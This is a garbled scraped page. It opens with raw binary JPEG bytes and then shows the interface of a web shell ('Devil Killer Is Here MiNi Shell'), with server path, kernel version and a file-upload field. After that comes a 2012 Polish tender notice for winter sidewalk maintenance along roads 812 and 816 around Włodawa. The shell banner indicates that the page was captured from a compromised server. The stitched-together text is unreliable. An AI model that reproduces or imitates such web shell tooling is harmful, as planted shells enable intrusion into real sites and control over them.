JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121009/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121009/214799-N-2012.html

<p class="kh_header"><b>Włodawa: Usługi związane z zimowym utrzymaniem chodników  położonych wzdłuż dróg
 wojewódzkich nr 812 i 816 w granicach administracyjnych miasta Włodawa,
 miejscowości  Suszno i Orchówek oraz ścieżki pieszo-rowerowej na trasie 
 Włodawa - Okuninka w sezonie 2012/2013</b><br>
<b>Numer ogłoszenia: 214799 - 2012; data zamieszczenia: 09.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich Lublin Rejon Dróg Wojewódzkich we Włodawie , ul. Lubelska 60, 22-200 Włodawa, woj. lubelskie, tel. 082 5721635, 5721151, faks 082 5721793.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.lublin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Samorządowa jednostka budżetowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi związane z zimowym utrzymaniem chodników  położonych wzdłuż dróg
 wojewódzkich nr 812 i 816 w granicach administracyjnych miasta Włodawa,
 miejscowości  Suszno i Orchówek oraz ścieżki pieszo-rowerowej na trasie 
 Włodawa - Okuninka w sezonie 2012/2013.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje:

Odśnieżanie i zwalczanie śliskości zimowej przy użyciu piasku na całej szerokości chodników i ścieżek pieszo-rowerowych z uwzględnieniem odcinków stanowiących dojścia do przejść dla pieszych i przejazdu dla rowerów: 

1) Zadanie Nr  1 - chodniki i ścieżki położone przy drodze wojewódzkiej Nr 816 Terespol -
                            Kodeń - Sławatycze - Włodawa - Dorohusk. 
2) Zadanie Nr  2 - chodniki i ścieżki położone przy drodze wojewódzkiej Nr 812 
                               Biała Podlaska - Wisznice -  Włodawa - Chełm. 
  	Szczegółowy wykaz odcinków objętych zamówieniem zawiera załącznik  
Wykaz i lokalizacja chodników i ścieżek pieszo - rowerowych objętych zimowym utrzymaniem
3. Zamawiający, w zależności od warunków atmosferycznych zastrzega sobie prawo
    zmniejszenia zakresu zamówienia poprzez zmniejszenie krotności wykonywania usług.
4.  Warunki realizacji zamówienia
1)  decyzję o rozpoczęciu i zakończeniu sezonu wykonywania usług objętych
     zamówieniem podejmować będzie Kierownik Rejonu Dróg Wojewódzkich we Włodawie.
2)	wzywanie do pracy zespołów roboczych Wykonawcy odbywać się będzie telefonicznie
      przez upoważnionych pracowników Zamawiającego.
5.  Do obowiązków Wykonawcy należeć będzie:
1)	mechaniczne lub ręczne odśnieżanie chodników, ścieżek pieszo-rowerowych i dojść do przejść dla pieszych, na całej szerokości w taki sposób aby warstwa pozostawionego śniegu nie przekraczała 2-3 centymetrów;
2)	równomierne posypywanie piaskiem odśnieżonych powierzchni. 
      Niedopuszczalne jest rozsypywanie piasku zbrylonego, mieszanek z solą lub innymi
      środkami chemicznymi oraz występowanie nieciągłości w posypywaniu;
3)	wykonanie czynności opisanych w ppkt. 1 i 2, w ciągu 3 godzin od momentu przystąpienia do wykonywania usługi. 
4)	niezwłoczne przystępowanie po otrzymaniu wezwania, (maksymalnie w ciągu 1 godz.)
     do wykonywania powierzonej czynności wchodzącej w zakres zamówienia;
5)	zabezpieczenie i utrzymanie w gotowości sprzętu i maszyn przewidzianych do realizacji zamówienia, wraz z obsługą;
6)	zapewnienie we własnym zakresie paliwa i obsługi naprawczo - remontowej sprzętu przewidzianego do świadczenia usług;
7)	zabezpieczenie we własnym zakresie materiałów (piasku) do zwalczania śliskości zimowej;
      Piasek użyty do zwalczania śliskości zimowej chodników musi spełniać
      następujące  wymagania:
      - uziarnienie do 2,00 mm, nadziarna nie więcej niż 15% (nie dopuszcza się w
        nadziarnie ziaren pow. 4,00 mm,
      - nie może zawierać zanieczyszczeń organicznych jak trawa, korzenie itp.
      - barwa żółta,
      - nie może zawierać żadnych składników spoistych w tym choćby śladowych
        zanieczyszczeń gliniastych lub ilastych,
      Pozostałe wymagania powinny odpowiadać normie: PN-EN-13043;2004   
8)	załadunek piasku własnym sprzętem i na swój koszt;
9)	niezwłoczne przekazywanie upoważnionym pracownikom Zamawiającego, za pośrednictwem osób obsługujących pojazdy i sprzęt informacji o aktualnym stanie chodników, czasie rozpoczęcia i zakończenia wykonywania usług na poszczególnych odcinkach oraz zagrożeniach spowodowanych warunkami atmosferycznymi, 
6.  Zgodnie z art. 30 ust. 4 ustawy, Zamawiający  dopuszcza rozwiązania równoważne
     opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne 
     opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane usługi
     spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy 
     Prawo zamówień publicznych).Za rozwiązania równoważne uznana będzie oferta na
     wykonanie usług z wykorzystaniem sprzętu innego niż określony przez Zamawiającego,
     pod warunkiem, że jego parametry nie będą gorsze. 
Szacunkowas wartość zamówienia: Zadanie Nr 1 - 107150,00 PLN, Zadanie Nr 2 - 171940,00 PLN..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których
         spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Ocena spełnienia warunku dokonywana będzie na podstawie oświadczenia o spełnianiu warunków o których mowa w art. 22 ust.1. ustawy Pzp w sposób spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których
         spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Ocena spełnienia warunku dokonywana będzie na podstawie oświadczenia o spełnianiu warunków o których mowa w art. 22 ust.1. ustawy Pzp w sposób spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Na potwierdzenie warunku dysponowania potencjałem technicznym Wykonawca winien
         dysponować nośnikiem piaskarki i pługa odśnieżnego o masie całkowitej nie
         przekraczającej 2000 kg, w ilości minimum 2 szt. na jedno zadanie.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których
         spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Ocena spełnienia warunku dokonywana będzie na podstawie oświadczenia o spełnianiu warunków o których mowa w art. 22 ust.1. ustawy Pzp w sposób spełnia/nie spełnia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których
         spełnienie Wykonawca zobowiązany jest wykazać w sposób szczególny.
Ocena spełnienia warunku dokonywana będzie na podstawie oświadczenia o spełnianiu warunków o których mowa w art. 22 ust.1. ustawy Pzp w sposób spełnia/nie spełnia</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oprócz oświadczeń i dokumentów jakie należy dostarczyć w celu potwierdzenia
    spełniania warunków udziału w postępowaniu, Wykonawca obowiązany jest dołączyć do oferty:
      1) Ofertę przetargową (z ceną netto i z podatkiem VAT), wraz z 
          formularzem cenowym.       2) Zaakceptowany wzór umowy  
      3)  W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, 
          do oferty należy   załączyć   dokument   (np. odpowiednią  umowę) ustanawiający 
          pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia
          albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia
          publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
    
      4) W przypadku podpisania oferty i innych dokumentów przez osobę/osoby, które 
          nie są  wymienione w odpisie z właściwego rejestru do oferty należy załączyć dokument
          potwierdzający prawo do reprezentowania podmiotu przez osobę /osoby podpisujące
          ofertę.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany i uzupełnienia treści umowy wymagają dla swej ważności formy pisemnej
2. Zamawiający zgodnie z art. 144 ust.1 ustawy Pzp przewiduje możliwość zmian
    postanowień zawartej umowy w   stosunku do treści oferty polegających na
    zmianie wynagrodzenia w przypadku zmiany stawek podatku VAT,
3. W razie zaistnienia istotnej zmiany okoliczności powodującej, że wykonanie
     umowy nie leży w interesie publicznym, czego nie można było przewidzieć 
     w chwili zawarcia umowy, Zamawiający może odstąpić od umowy w terminie 
     30 dni od powzięcia wiadomości o tych okolicznościach.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ebip.lublin.pl/zdw<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie 22-200 Włodawa, ul. Lubelska 60 w pokoju Nr 2 w godz. 07:00 - 15:00.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 17.10.2012 godzina 09:00, miejsce: Zarząd Dróg Wojewódzkich w Lublinie, Rejon Dróg Wojewódzkich we Włodawie 22-200 Włodawa, ul. Lubelska 60 (sekretariat) 
Otwarcie ofert w dniu 17.10.2012 r. (świetlica) godz. 09:10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> oświadczenia, wnioski, zawiadomienia oraz informacje Zamawiający i Wykonawcy przekazują za pomocą faksu nr 82 57 21 793, 
82 57 24 162   lub drogą elektroniczną na adres  e-mail: rdw.wlodawa@zdw.lublin.pl.
Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub drogą elektroniczną, każda ze stron na żądanie drugiej  niezwłocznie potwierdza fakt ich otrzymania.
Do kontaktów z Wykonawcami uprawnione są osoby:
1)	W sprawach technicznych - Krystyna Kowalewska tel. (82 572 19 52)
2)	W sprawach formalno -prawnych związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy - Barbara Winiarczyk tel. (82 572 16 35), 
      Eugeniusz Kiewczykowski tel. (82 572 16 35)
UWAGA:
Wykonawcy, którzy uzyskają niniejszą specyfikację ze strony internetowej Zamawiającego lub w inny sposób i zamierzają ubiegać się o udzielenie zamówienia, proszeni są  o  przesłanie  krótkiej informacji zawierającej podstawowe dane firmy (nazwa, adres,nr telefonu, faxu, adres poczty elektronicznej) faksem nr 82 57 21 793, 82 57 24 162  lub pocztą elektroniczną na adres: rdw.wlodawa@zdw.lublin.pl.
Wykonawcy, którzy zgłoszą w ten sposób zamiar ubiegania się o udzielenie zamówienia będą przez Zamawiającego bezpośrednio zawiadamiani o np.: zapytaniach, wyjaśnieniach i zmianach dotyczących Specyfikacji Istotnych Warunków Zamówienia, przedłużeniu terminu składania ofert. 
POUCZENIE O ŚRODKACH  OCHRONY PRAWNEJ 

1.  Odwołanie przysługuje wyłącznie od niezgodnej z przepisami ustawy czynności
     zamawiającego podjętej w postępowaniu o udzielenie zamówienia lub zaniechania 
     czynności, do której zamawiający jest zobowiązany na podstawie ustawy.
2.  Odwołanie przysługuje zgodnie z art. 180 ust. 2 ustawy Prawo zamówień publicznych 
     (Dz. U. z 2010 r.  Nr 113 poz. 759 z późn. zmian.) wyłącznie wobec czynności:
     1) opisu sposobu dokonywania oceny spełniania warunków udziału w postępowaniu,
     2) wykluczenia odwołującego z postępowania o udzielenie zamówienia,
     3) odrzucenia oferty odwołującego.
3.  Odwołanie powinno wskazywać czynność lub zaniechanie czynności Zamawiającego, 
     której zarzuca się niezgodność z przepisami ustawy, zawierać zwięzłe przedstawienie 
     zarzutów, określać żądanie oraz wskazywać okoliczności faktyczne i prawne 
     uzasadniające wniesienie odwołania. 
4.  Odwołanie wnosi się do Prezesa Izby w formie pisemnej albo elektronicznej opatrzonej
      bezpiecznym podpisem elektronicznym weryfikowanym za pomocą ważnego 
      kwalifikowanego certyfikatu.
5.  Odwołujący przesyła kopię odwołania Zamawiającemu przed upływem terminu do
     wniesienia odwołania w taki sposób, aby mógł on zapoznać się z jego treścią przed
    upływem tego terminu. Domniemywa się, iż Zamawiający mógł zapoznać się z treścią odwołania przed upływem terminu na jego wniesieni, jeżeli przesłanie jego kopii nastąpiło przed upływem na jego wniesienie za pomocą jednego ze sposobów określonych w art. 27 ust. 2 ustawy.
6. Zgodnie z art. 182 ust. 1 pkt. 2) odwołanie wnosi się w terminie 5 dni od dnia przesłania informacji o  czynności zamawiającego stanowiącej podstawę jego wniesienia  - jeżeli zostały przesłane w sposób określony w art. 27 ust. 2, albo w terminie 10 dni - jeżeli zostały przesłane w inny sposób.
7. Zgodnie z art. 182 ust 2 pkt. 2 odwołanie wobec treści ogłoszenia o zamówieniu wnosi się w terminie 5 dni od dnia zamieszczenia ogłoszenia w Biuletynie Zamówień Publicznych lub specyfikacji istotnych warunków zamówienia na stronie internetowej.
8. Odwołanie wobec czynności innych niż określone w pkt. 6 i 7 wnosi się w terminie 5 dni od dnia, w którym  powzięto lub przy zachowaniu należytej staranności można było powziąć wiadomość o okolicznościach stanowiących podstawę jego wniesienia.
9. Jeżeli Zamawiający nie przesłał Wykonawcy zawiadomienia o wyborze najkorzystniejszej oferty odwołanie wnosi się w terminie 15 dni od dnia zamieszczenia w Biuletynie Zamówień Publicznych ogłoszenie o udzieleniu zamówienia.
10. Jeżeli Zamawiający nie zamieścił w Biuletynie Zamówień Publicznych ogłoszenia o udzieleniu zamówienia odwołanie wnosi się w terminie 1 miesiąca od dnia zawarcia umowy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie Nr  1 - chodniki i ścieżki położone przy drodze wojewódzkiej Nr 816 Terespol -
                            Kodeń - Sławatycze - Włodawa - Dorohusk..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Do obowiązków Wykonawcy należeć będzie:
1)	mechaniczne lub ręczne odśnieżanie chodników, ścieżek pieszo-rowerowych i dojść do przejść dla pieszych, na całej szerokości w taki sposób aby warstwa pozostawionego śniegu nie przekraczała 2-3 centymetrów;
2)	równomierne posypywanie piaskiem odśnieżonych powierzchni. 
      Niedopuszczalne jest rozsypywanie piasku zbrylonego, mieszanek z solą lub innymi
      środkami chemicznymi oraz występowanie nieciągłości w posypywaniu;
3)	wykonanie czynności opisanych w ppkt. 1 i 2, w ciągu 3 godzin od momentu przystąpienia do wykonywania usługi. 
4)	niezwłoczne przystępowanie po otrzymaniu wezwania, (maksymalnie w ciągu 1 godz.)
     do wykonywania powierzonej czynności wchodzącej w zakres zamówienia;
5)	zabezpieczenie i utrzymanie w gotowości sprzętu i maszyn przewidzianych do realizacji zamówienia, wraz z obsługą;
6)	zapewnienie we własnym zakresie paliwa i obsługi naprawczo - remontowej sprzętu przewidzianego do świadczenia usług;
7)	zabezpieczenie we własnym zakresie materiałów (piasku) do zwalczania śliskości zimowej;
      Piasek użyty do zwalczania śliskości zimowej chodników musi spełniać
      następujące  wymagania:
      - uziarnienie do 2,00 mm, nadziarna nie więcej niż 15% (nie dopuszcza się w
        nadziarnie ziaren pow. 4,00 mm,
      - nie może zawierać zanieczyszczeń organicznych jak trawa, korzenie itp.
      - barwa żółta,
      - nie może zawierać żadnych składników spoistych w tym choćby śladowych
        zanieczyszczeń gliniastych lub ilastych,
      Pozostałe wymagania powinny odpowiadać normie: PN-EN-13043;2004   
8)	załadunek piasku własnym sprzętem i na swój koszt;
9)	niezwłoczne przekazywanie upoważnionym pracownikom Zamawiającego, za pośrednictwem osób obsługujących pojazdy i sprzęt informacji o aktualnym stanie chodników, czasie rozpoczęcia i zakończenia wykonywania usług na poszczególnych odcinkach oraz zagrożeniach spowodowanych warunkami atmosferycznymi, 
6.  Zgodnie z art. 30 ust. 4 ustawy, Zamawiający  dopuszcza rozwiązania równoważne
     opisywanym. Wykonawca, który powołuje się na rozwiązania równoważne 
     opisywanym przez Zamawiającego jest obowiązany wykazać, że oferowane usługi
     spełniają wymagania określone przez Zamawiającego (art. 30 ust. 5 ustawy 
     Prawo zamówień publicznych).Za rozwiązania równoważne uznana będzie oferta na
     wykonanie usług z wykorzystaniem sprzętu innego niż określony przez Zamawiającego,
     pod warunkiem, że jego parametry nie będą gorsze. 
Szacunkowa wartość zadania netto: 107150,00 PLN.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.62.00.00-9, 90.63.00.00-2.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie Nr  2 - chodniki i ścieżki położone przy drodze wojewódzkiej Nr 812 
                               Biała Podlaska - Wisznice -  Włodawa - Chełm..</p>
